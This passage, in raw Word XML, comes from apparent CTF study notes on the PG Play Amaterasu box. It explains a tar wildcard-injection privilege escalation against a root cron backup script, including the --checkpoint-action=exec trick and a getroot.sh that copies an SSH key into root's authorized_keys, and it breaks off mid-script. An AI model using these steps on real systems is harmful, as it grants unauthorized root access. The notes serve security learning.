      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000258A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000258B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_alkusyqm6v4t" w:id="329"/>
      <w:bookmarkEnd w:id="329"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example3 of Bash gobbling or Linux tar wildcard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000258C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000258D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play Amaterasu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000258E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000258F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002590">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5003800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="161" name="image153.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image153.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId801"/>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2591">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002592">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is known as Bash Gobbling or Linux tar wildcard (globbing). This also teaches us about Bash Scripting. Here is an explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002593">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002594">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, they found a cron job using LinPeas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002595">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002596">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Initial Discovery: Vulnerable Cron Job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002597">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002598">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/crontab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002599">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They discover a cron job that runs a script as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> every 5 minutes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000259A">
      <w:pPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5 * * * * root /usr/local/bin/backup-flask.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000259B">
      <w:pPr>
        <w:spacing w:after="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means every hour at minute 5 (e.g., 12:05, 1:05, etc.), </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backup-flask.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000259C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They inspect the script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000259D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /usr/local/bin/backup-flask.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000259E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000259F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export PATH="/home/alfredo/restapi:$PATH"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /home/alfredo/restapi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar czf /tmp/flask.tar.gz *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_su1jatidfn06" w:id="330"/>
      <w:bookmarkEnd w:id="330"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A4">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Observations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The script </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uses tar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to compress all files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/home/alfredo/restapi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31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PATH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is prepended with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/alfredo/restapi</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so any command (like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could be overridden by a file with the same name in that directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="311"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It runs as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025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A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025AA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Vulnerability: Tar Wildcard Exploit (Bash Gobbling)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025AB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>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command is known to be vulnerable to a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wildcard injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025AC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Specifically, if a filename starts with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--checkpoint-action=exec=...</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--checkpoint=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> also exists,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will execute the script provided as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025AD">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, the attacker prepares malicious files with those names to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">inject arguments into tar</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025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AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Creating a Malicious </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bash </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Script (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="188038"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getroot.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B1">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They want to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">copy their SSH public key into root's authorized_keys file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so they can SSH in as root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd restapi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo '#!/bin/bash' &gt;&gt; getroot.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000025B5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo 'cp /home/alfredo/.ssh/authorized_keys /root/.ssh/authorized_keys ' &gt;&gt; getroot.sh</w:t>
      </w:r>
    </w:p>
